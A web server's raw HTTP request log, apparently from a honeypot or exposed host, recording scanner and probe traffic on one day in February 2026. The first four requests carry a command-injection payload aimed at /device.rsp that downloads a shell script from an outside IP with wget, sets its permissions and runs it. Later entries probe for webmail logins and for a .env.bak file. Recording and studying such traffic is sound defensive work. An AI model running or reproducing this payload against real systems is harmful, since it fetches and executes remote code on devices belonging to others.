Content-Length: 0
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:39818
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bbusybox+wget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-02-22 20:40:24] === HTTP Request ===
===================
Content-Length: 0
Cookie: uid=1
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:36966
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: POST
[2026-02-22 20:39:55] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Cookie: uid=1
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:59212
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-22 20:39:32] === HTTP Request ===
===================
Cookie: uid=1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:40648
Query: opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Path: /device.rsp
URL: /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3Brm+-f+kla.sh%3Bwget+-O+kla.sh+http%3A%2F%2F45.148.120.23%2Fbins%2Fkla.sh%3Bchmod+777+kla.sh%3Bsh+kla.sh+tbk+%26
Method: GET
[2026-02-22 20:39:01] === HTTP Request ===
[2026-02-22 20:34:39] Main page accessed - IP: 147.185.132.192:51181
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 147.185.132.192:51181
Path: /
URL: /
Method: GET
[2026-02-22 20:34:39] === HTTP Request ===
[2026-02-22 19:59:48] Main page accessed - IP: 45.82.78.107:41086
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.82.78.107:41086
Path: /
URL: /
Method: GET
[2026-02-22 19:59:48] === HTTP Request ===
[2026-02-22 19:22:47] Main page accessed - IP: 80.82.77.202:41376
===================
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 80.82.77.202:41376
Path: /
URL: /
Method: GET
[2026-02-22 19:22:47] === HTTP Request ===
[2026-02-22 19:22:17] Main page accessed - IP: 204.76.203.8:40844
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:40844
Path: /
URL: /
Method: GET
[2026-02-22 19:22:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:56662
Path: /jars
URL: /jars
Method: GET
[2026-02-22 18:50:25] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50033
Path: /.env.bak
URL: /.env.bak
Method: GET
[2026-02-22 18:46:46] === HTTP Request ===
[2026-02-22 18:36:06] Main page accessed - IP: 172.30.0.12:52142
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.151.194.164
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52142
Path: /
URL: /
Method: GET
[2026-02-22 18:36:06] === HTTP Request ===
[2026-02-22 18:35:02] Main page accessed - IP: 172.30.0.12:52142
===================
Via: 1.1 Caddy
User-Agent: visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.151.194.164
Referer: http://admin.vulnberries.ru/
Accept-Encoding: gzip
Accept: */*
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:52142
Path: /
URL: /
Method: GET
[2026-02-22 18:35:02] === HTTP Request ===
[2026-02-22 18:14:50] Main page accessed - IP: 195.3.221.86:55742
===================
Connection: close
User-Agent: python-requests/2.31.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:55742
Path: /
URL: /
Method: GET
[2026-02-22 18:14:50] === HTTP Request ===
[2026-02-22 17:56:06] Main page accessed - IP: 176.65.149.45:41374
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:41374
Path: /
URL: /
Method: GET
[2026-02-22 17:56:06] === HTTP Request ===
[2026-02-22 15:18:31] Main page accessed - IP: 204.76.203.8:40182
===================
Connection: close
User-Agent: Mozilla/5.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.8:40182
Path: /
URL: /
Method: GET
[2026-02-22 15:18:31] === HTTP Request ===
[2026-02-22 14:40:04] Main page accessed - IP: 176.65.149.45:35690
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:35690
Path: /
URL: /
Method: GET
[2026-02-22 14:40:04] === HTTP Request ===
[2026-02-22 14:03:53] Main page accessed - IP: 207.90.244.20:58640
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.20:58640
Path: /
URL: /
Method: GET
[2026-02-22 14:03:53] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.225:65424
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 11:44:09] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: gitlab.anzan.tech
RemoteAddr: 147.185.132.63:60568
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-02-22 11:25:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45421
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.5
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45413
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45405
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45407
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45403
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45401
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45397
Path: /js/zimbraMail/share/model/ZmSettings.js
URL: /js/zimbraMail/share/model/ZmSettings.js
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45399
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.5
Connection: close
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45391
Path: /owa/
URL: /owa/
Method: GET
[2026-02-22 10:56:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45383
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45379
Path: /owa
URL: /owa
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45373
Path: /cube/
URL: /cube/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45377
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45369
Path: /cube
URL: /cube
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45361
Path: /webmail/rc/
URL: /webmail/rc/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45355
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 MarketGoo/2.1
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45367
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45363
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45357
Path: /webmail/rc
URL: /webmail/rc
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45349
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45347
Path: /mail/roundcube/
URL: /mail/roundcube/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45345
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45341
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45333
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45337
Path: /mail/roundcube
URL: /mail/roundcube
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45339
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45327
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45331
Path: /webmail/roundcube/
URL: /webmail/roundcube/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 MarketGoo/2.1
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45325
Path: /webmail/roundcube
URL: /webmail/roundcube
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45317
Path: /rc
URL: /rc
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45313
Path: /rc/
URL: /rc/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45305
Path: /roundcubemail
URL: /roundcubemail
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45293
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45301
Path: /roundcubemail/
URL: /roundcubemail/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45285
Path: /email/
URL: /email/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45289
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45297
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45295
Path: /email
URL: /email
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.6
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45291
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45281
Path: /rcmail
URL: /rcmail
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45277
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45275
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45267
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45271
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45269
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45265
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45263
Path: /rcmail/
URL: /rcmail/
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.3
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45253
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45259
Path: /rcube
URL: /rcube
Method: GET
[2026-02-22 10:56:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.6
Connection: close
Headers:
Protocol: HTTP/1.1
Host: anzan.tech:8081
RemoteAddr: 5.101.157.87:45249
Path: /mail
URL: /mail
